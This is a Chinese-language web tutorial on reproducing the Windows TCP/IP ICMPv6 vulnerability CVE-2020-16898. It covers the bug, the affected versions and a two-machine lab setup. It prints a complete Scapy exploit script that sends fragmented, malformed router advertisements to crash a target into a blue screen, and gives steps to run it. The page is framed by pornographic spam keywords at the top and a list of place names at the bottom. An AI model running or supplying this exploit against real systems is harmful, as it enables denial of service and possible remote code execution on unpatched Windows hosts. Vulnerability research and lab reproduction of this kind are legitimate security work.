亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行CVE-2020-16898漏洞復現

發布時間:2021-12-28 19:52:42 來源:億速云 閱讀:163 作者:柒染 欄目:安全技術

本篇文章為大家展示了如何進行CVE-2020-16898漏洞復現,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

漏洞簡介

當Windows TCP / IP大小不當處理ICMPv6路由器廣告數據包時,存在遠程執行代碼入侵。成功利用此入侵的攻擊者可以獲取目標服務器或客戶端上執行代碼的能力,可以讓受害機藍屏

為了利用此漏洞,攻擊者可能必須將經過特殊設計的ICMPv6路由器廣告數據包發送到遠程Windows計算機上。

漏洞分析

當Windows TCP / IP堆棧不適當地處理使用選項類型25(遞歸DNS服務器選項)且長度字段值為偶數的ICMPv6路由器廣告數據包時,存在一個漏洞。

當提供一個偶數長度值時,Windows TCP / IP堆棧錯誤地將網絡緩沖區的行進量減少了8個字節。這是因為堆棧在內部以16字節為增量進行計數,因此無法解決使用非RFC兼容長度值的情況。這種不匹配導致堆棧將當前選項的最后8個字節解釋為第二個選項的開始,最終導致緩沖區溢出和潛在的RCE。

影響版本

? Microsoft Windows 10 1709? Microsoft Windows 10 1803? Microsoft Windows 10 1809? Microsoft Windows 10 1903? Microsoft Windows 10 1909? Microsoft Windows 10 2004? Microsoft Windows Server 2019

環境部署

攻擊機IP:192.168.192.1(win10 1909)

如何進行CVE-2020-16898漏洞復現

靶機IP:192.168.192.128 (win10 1809)

如何進行CVE-2020-16898漏洞復現

漏洞復現

確定靶機開啟NAT模式以及開啟ipv6

全屏模式下點擊虛擬網絡編輯器然后點擊更改設置

如何進行CVE-2020-16898漏洞復現

然后再開啟ipv6,點擊確定

如何進行CVE-2020-16898漏洞復現

確認兩臺機器都可以互相ping通

靶機ping攻擊機

如何進行CVE-2020-16898漏洞復現

攻擊機ping靶機

如何進行CVE-2020-16898漏洞復現

查看靶機的ipv6地址

如何進行CVE-2020-16898漏洞復現

查看攻擊機的ipv6地址

如何進行CVE-2020-16898漏洞復現

接著使用一個網上的pyload

內容為

from scapy.all import *from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6 v6_dst = "fd15:4ba5:5a2b:1008:5d26:75a3:1641:ee3" #根據上面的修改為目標機的ipv6地址 或者 臨時ipv6地址v6_src = "fe80::9548:d004:9491:9c34%13" #攻擊者的本地ipv6地址 p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"p_test = p_test_half + 'A'.encode()*4 c = ICMPv6NDOptEFA() e = ICMPv6NDOptRDNSS()e.len = 21e.dns = ["AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]aaa = ICMPv6NDOptRDNSS()aaa.len = 8pkt = ICMPv6ND_RA() / aaa / \ Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \ IPv6ExtHdrFragment()/pkt l=fragment6(p_test_frag, 200) for p in l: send(p)

上邊的目標機的ip要為ipv6地址或臨時ipv6地址

攻擊機的ipv6要為本地鏈接ipv6地址

將地址寫入到payload中,可以實施攻擊。

攻擊的要利用到一個scapy的組件,這個組件依賴于python環境

在攻擊機上裝上python環境 (從官網下載并配置環境)

Scapy是一個Python程序,使用戶能夠發送,嗅探和剖析并偽造網絡數據包。此功能允許構建可以探測,掃描或攻擊網絡的工具。

命令為:pip install scapy

如果失敗的話可能是python版本太高,可以選用python3.7版本的

如何進行CVE-2020-16898漏洞復現

可以看出我是裝了這個組件的

啟動scapy,出現如下界面

如何進行CVE-2020-16898漏洞復現

cd進入桌面(桌面存在這個文件)

然后使用這個命令:

python CVE-2020-16898.py

可以看到受害機藍屏

如何進行CVE-2020-16898漏洞復現

實驗完成

漏洞修復

盡量開啟防火墻

關閉ipv6服務

對外部流量進行嚴格過濾

上述內容就是如何進行CVE-2020-16898漏洞復現,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

枣庄市| 黄石市| 中江县| 乐平市| 长寿区| 新安县| 延寿县| 大化| 陇西县| 磐安县| 都兰县| 波密县| 漯河市| 托里县| 竹北市| 商丘市| 凉山| 华安县| 大方县| 遵化市| 丘北县| 福海县| 固原市| 郎溪县| 望奎县| 隆昌县| 九龙城区| 保定市| 彭阳县| 丹寨县| 扶绥县| 张家界市| 桐柏县| 河南省| 通化市| 内丘县| 安多县| 连州市| 额济纳旗| 当雄县| 成武县|